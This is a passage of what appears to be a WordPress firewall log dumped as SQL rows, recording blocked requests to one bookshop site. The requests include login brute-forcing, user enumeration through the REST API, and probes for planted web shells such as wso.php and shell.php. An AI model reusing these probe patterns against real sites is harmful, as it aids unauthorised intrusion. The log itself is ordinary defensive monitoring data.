AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','cbBtfCa083OdopFLlZezvmTA',0,1636939931.2609,762,'','POST',403,0,600,0,1,'',0),('157.245.192.138',2650128522,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','X3E7LybW8uBds9VIawKve6Np',0,1636951278.0558,612,'','GET',403,0,520,0,1,'',0),('192.187.118.205',3233511117,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','5FmgRweWXzjPNQvMl9D26iSh',0,1636951863.7191,192,'','POST',403,0,600,0,1,'',0),('192.187.127.21',3233513237,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','M9aGqWv3w6mrC1S08oN7lfOV',0,1636954580.8014,184,'','POST',403,0,600,0,1,'',0),('51.38.187.133',858176389,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','pHVr4iWfFZQAX3GjC56hbdxP',0,1636956386.3372,1103,'','POST',403,0,600,0,1,'',0),('134.209.196.64',2261894208,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','5pqoDYhOEisMRXKcaICfFGgk',0,1636957450.1953,461,'','POST',403,0,600,0,1,'',0),('121.43.170.78',2032904782,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','ApwnfROkNab8CGPq7TMrEKzm',0,1636958522.1818,452,'','POST',403,0,600,0,1,'',0),('52.183.137.156',884443548,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','MgrOwCJF4pqj6cIWdADL2k80',0,1636960944.2049,534,'','POST',403,0,600,0,1,'',0),('185.49.20.79',3107001423,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','u9QwxSMrsm0BeHc7kVvqnE1b',0,1636961640.5347,651,'','POST',403,0,600,0,1,'',0),('173.212.235.115',2916412275,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','wstRHNUv97fM4mELCobg1kjT',0,1636962257.4160,510,'','POST',403,0,600,0,1,'',0),('84.255.199.31',1426048799,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','W7eZuHFf6wlPpG24CDOsx9NE',0,1636962876.9441,444,'','POST',403,0,600,0,1,'',0),('195.67.74.174',3275967150,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','Kx0TjBd5tbXFzDRcv4hmJequ',0,1636963575.8403,451,'','POST',403,0,600,0,1,'',0),('23.95.217.2',392157442,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','HG4XeIqBmoubDAR73E1rPkVF',0,1636964297.5678,451,'','POST',403,0,600,0,1,'',0),('69.163.224.119',1168367735,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','HN5jrSdokyhJeEzZ062iLCvR',0,1636964983.2112,850,'','POST',403,0,600,0,1,'',0),('157.245.95.172',2650103724,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','QnEpB5w8jldsgxhiqLDKaoM4',0,1636965626.7952,613,'','POST',403,0,600,0,1,'',0),('192.187.127.21',3233513237,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','kRDxg7NGVfXoK2ZCi8yPaTLe',0,1636965638.0342,473,'','POST',403,0,600,0,1,'',0),('194.163.133.151',3265496471,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','F9XPZfgNLl58Ms4j6avzHKcm',0,1636966244.1113,527,'','POST',403,0,600,0,1,'',0),('45.40.166.141',757638797,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','sPVKq6LQUiblACdFeSxp3WRY',0,1636966834.1350,409,'','POST',403,0,600,0,1,'',0),('161.97.146.123',2707526267,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','7MpJHm1BCP4uYqTGOdNKhEnR',0,1636967509.3430,472,'','POST',403,0,600,0,1,'',0),('103.142.26.247',1737366263,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','6m5470uhkFK32iS9vUJEjNfM',0,1636968135.0141,508,'','POST',403,0,600,0,1,'',0),('178.128.215.197',2994788293,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','sSKpAMZJ04V5YWzaRjiDcEXt',0,1636968801.7785,463,'','POST',403,0,600,0,1,'',0),('89.96.90.125',1499486845,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','biS5kjg8HTzLOGMyPFAvNawu',0,1636969445.6164,417,'','POST',403,0,600,0,1,'',0),('167.172.190.95',2813115999,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','nd46hUflM89XSZG3pTDK5WYg',0,1636970088.6710,697,'','POST',403,0,600,0,1,'',0),('89.207.146.189',1506775741,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','f53jBiFd4GRSs0laDLe7ZhyA',0,1636970787.9184,460,'','POST',403,0,600,0,1,'',0),('192.187.118.205',3233511117,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','EipzPn0OarMBfVKyQIN6Stk9',0,1636970893.1896,440,'','POST',403,0,600,0,1,'',0),('138.68.191.9',2319761161,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','bDQitqC1hrKM7E6FN2jxzSJX',0,1636971469.9000,516,'','POST',403,0,600,0,1,'',0),('62.178.170.93',1051896413,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','9n71ZxdhqgmUQXWzFkIilYaj',0,1636972132.8776,474,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-content/themes/magazine-hoot/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','fTrdWaO5MVwRlBo14tPXjZDL',0,1636972495.9371,130,'','GET',403,0,700,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-content/themes/magazine-hoot/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','TnYQSk3qyuE5eObBh926moVa',0,1636972496.0841,402,'','GET',403,0,700,0,1,'',0),('206.189.129.168',3468525992,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','Nmg5jqCkxi7cZI86FaHyurts',0,1636972775.6316,463,'','POST',403,0,600,0,1,'',0),('138.68.69.48',2319729968,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','PUCrThIj4iRs1SAgFntKHM8u',0,1636973439.0832,437,'','POST',403,0,600,0,1,'',0),('103.39.134.190',1730643646,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','PcHBSbiKf4FL82tlUIvwdhW5',0,1636974123.4293,545,'','POST',403,0,600,0,1,'',0),('81.88.52.26',1364735002,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','Fjema3h4OKNi8HCBvd19R0Xg',0,1636974898.8063,1166,'','POST',403,0,600,0,1,'',0),('167.71.199.161',2806499233,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','D7kHxTidOzajVc4Ef5wyntZb',0,1636975584.5989,623,'','POST',403,0,600,0,1,'',0),('67.205.61.254',1137524222,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','AJhlOSKxwbgtnjaq05i4MQz3',0,1636976924.4071,576,'','POST',403,0,600,0,1,'',0),('192.187.127.21',3233513237,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','JgObkz06IWx8ZfesKw1nGMB5',0,1636977521.1322,518,'','POST',403,0,600,0,1,'',0),('139.59.75.162',2335919010,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','fX34UigbBDx5WQAcz7VdrR1y',0,1636977585.9123,426,'','POST',403,0,600,0,1,'',0),('64.20.39.18',1075062546,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','TkuODRayKJbXV4QUI1mG6n2x',0,1636977699.2815,438,'','GET',403,0,520,0,1,'',0),('107.150.57.34',1805007138,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.78.2 (KHTML, like Gecko) Version\\/7.0.6 Safari\\/537.78.2\"}','WlJ8Vi75PkUyfjc0bpm1ETug',0,1636978935.3629,572,'','POST',403,0,600,0,1,'',0),('52.183.137.156',884443548,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','BIm6W5jFtu9Xc3bianJUzOeZ',0,1636979111.5080,673,'','POST',403,0,600,0,1,'',0),('45.120.69.121',762856825,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','iocFUYEaDLqn7gfKO1smV0bS',0,1636980577.6603,530,'','POST',403,0,600,0,1,'',0),('94.23.83.103',1578586983,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','wWZrRlNba25fmF1Cgi8GKjAV',0,1636981272.7999,1023,'','POST',403,0,600,0,1,'',0),('167.172.151.91',2813106011,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','MVhWXai7gEmTYZeoQuxFpBPk',0,1636982067.4445,489,'','POST',403,0,600,0,1,'',0),('150.95.83.201',2522829769,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','LFynsUvVZ0Q6zShTioBgRJXI',0,1636982784.6166,819,'','POST',403,0,600,0,1,'',0),('162.240.16.237',2733641965,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','u1bJvwrAVmO3qHaN4hCSlUDc',0,1636983445.7905,632,'','POST',403,0,600,0,1,'',0),('192.187.118.205',3233511117,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','AamL85xUqPSNH90izr2ntK1O',0,1636983859.6035,948,'','POST',403,0,600,0,1,'',0),('45.12.32.57',755769401,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','PB6a8C39euox2s1MXRZnIJmy',0,1636984097.1727,438,'','POST',403,0,600,0,1,'',0),('208.113.163.102',3497108326,'','https://ashbooks.co.uk/wp-content/themes/cepair/db.php?u=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','FWX0ptJS71GdHcqwQzLC5TMB',0,1636984535.2862,475,'','GET',403,0,700,0,1,'',0),('208.113.163.102',3497108326,'','https://ashbooks.co.uk/wp-content/plugins/wp-pollz/includes/green.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','S0WZQL6eoxr3sE45yMYfIkPJ',0,1636984613.1205,478,'','GET',403,0,700,0,1,'',0),('134.209.196.64',2261894208,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','tWTDLhl4m17V65YpUNXfMcQu',0,1636985501.9724,509,'','POST',403,0,600,0,1,'',0),('116.203.150.71',1959499335,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','y6M2TInuGi8mchRasqPjgbtE',0,1636986150.4695,453,'','POST',403,0,600,0,1,'',0),('176.31.0.242',2954821874,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','p8HBh3skPmgV1J46owLMSqiU',0,1636986862.0733,506,'','POST',403,0,600,0,1,'',0),('136.144.210.23',2291192343,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','89trzK7pwDvg0OFV4iCqaZ1u',0,1636987541.4876,511,'','POST',403,0,600,0,1,'',0),('82.202.172.247',1389014263,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','bdv08f9EQqHNs2il7OrPFgLZ',0,1636988232.8874,641,'','POST',403,0,600,0,1,'',0),('192.187.118.205',3233511117,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','7pXqosrHGWMPi95uvtNxOFTC',0,1636990930.3018,458,'','POST',403,0,600,0,1,'',0),('45.158.15.145',765333393,'','https://ashbooks.co.uk/wp-indo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','aeI7QGPyAXDb59xtYHiJ1N2C',0,1636991974.6272,801,'','GET',403,0,700,0,1,'',0),('107.150.48.236',1805005036,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','RsUQvwpe4G7jOrxogfISbkZ8',0,1636999128.6883,165,'','POST',403,0,600,0,1,'',0),('107.150.57.34',1805007138,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) GSA\\/4.1.0.31802 Mobile\\/11D257 Safari\\/9537.53\"}','2canojbsxKzEghB4yP3qeMvZ',0,1637005612.4308,177,'','POST',403,0,600,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','BsFlR07ZtVIjoh8w6HE3Lg2k',0,1637007357.2361,1595,'','GET',403,0,520,0,1,'',0),('104.168.174.187',1755885243,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','3YyGaCQpNT8zStP5cZJg2BjU',0,1637007422.2387,1734,'','GET',403,0,520,0,1,'',0),('69.30.217.108',1159649644,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','o7g52GXfedJ1tblKFD3xHApZ',0,1637007550.7736,1726,'','POST',403,0,600,0,1,'',0),('162.55.178.210',2721559250,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','KbepBFRVTWN5iUcjPmhADrJf',0,1637011158.4913,2121,'','GET',403,0,520,0,1,'',0),('192.187.127.21',3233513237,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','KyRYzEpVolsnQS01P5Xr9Aju',0,1637014603.0761,407,'','POST',403,0,600,0,1,'',0),('173.208.152.237',2916129005,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','phJY7Kri4ay3t9mTD6FMG5gB',0,1637016290.5134,195,'','POST',403,0,600,0,1,'',0),('137.184.117.45',2310567213,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','lX2J5PIoMCZnO4KQ9u7UhYqd',0,1637016978.5701,159,'','GET',403,0,520,0,1,'',0),('130.149.80.199',2190823623,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/12.0 Safari\\/605.1.15\"}','bx6WI1vQJm9E0F7Pqo3MpgXh',0,1637018407.4334,438,'','POST',403,0,600,0,1,'',0),('139.162.179.198',2342695878,'','https://ashbooks.co.uk/wp-stream.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/533.36 (KHTML, like Gecko) Chrome\\/46.0.2754.75 Safari\\/533.36\",\"2\":\"ashbooks.co.uk\"}','WqYUQ6jb0a3XDgnAwE28KP4r',0,1637020401.1699,369,'','GET',403,0,700,0,1,'',0),('13.70.143.132',222728068,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','kHnVFvu7iYZ2SAQ1c0tOTbIN',0,1637021353.2284,1045,'','GET',403,0,520,0,1,'',0),('13.70.143.132',222728068,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','cLMqu6kD5HFA3f2bP7OdNx8o',0,1637024048.5718,482,'','GET',403,0,520,0,1,'',0),('107.150.57.34',1805007138,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','rR9vw1bIkAoPt7zBc6ElgFes',0,1637028096.2511,456,'','POST',403,0,600,0,1,'',0),('107.150.57.34',1805007138,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','0zoeIZ7yFKVNuHShpG4mJaOW',0,1637030996.9481,663,'','POST',403,0,600,0,1,'',0),('69.30.231.158',1159653278,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','gjsdS9nrwfVxWetbl1ho5Ymv',0,1637032274.9475,461,'','POST',403,0,600,0,1,'',0),('69.30.231.158',1159653278,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','xnoDAYMdCGX7ml9NyZbVu1j4',0,1637040382.3315,551,'','POST',403,0,600,0,1,'',0),('204.12.198.246',3423389430,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\\/5.0)\"}','J684m21VFAjSTt9WZKDYqhRw',0,1637040454.0665,452,'','POST',403,0,600,0,1,'',0),('69.30.217.108',1159649644,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','72JfapXZysMg0mrNYvCQ6I51',0,1637041440.8271,179,'','POST',403,0,600,0,1,'',0),('192.187.127.21',3233513237,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','Vsrje2SfMC9KhvYZG7ciouBW',0,1637041870.1316,463,'','POST',403,0,600,0,1,'',0),('69.30.231.158',1159653278,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux i686) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','lTSJ6nGsoDcumqvdN3MfUCh5',0,1637047452.5070,553,'','POST',403,0,600,0,1,'',0),('69.30.240.27',1159655451,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','AEbZG92I6n1rjhYQlNKfO480',0,1637048554.4597,474,'','POST',403,0,600,0,1,'',0),('204.12.198.246',3423389430,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.114 Safari\\/537.36\"}','PZUcEMpiTjDeW8HAV1oJz94Y',0,1637049138.6365,524,'','POST',403,0,600,0,1,'',0),('192.187.118.205',3233511117,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','B2yEMfYVS0spOrJoqviLe9bF',0,1637052365.4266,206,'','POST',403,0,600,0,1,'',0),('69.30.231.158',1159653278,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; 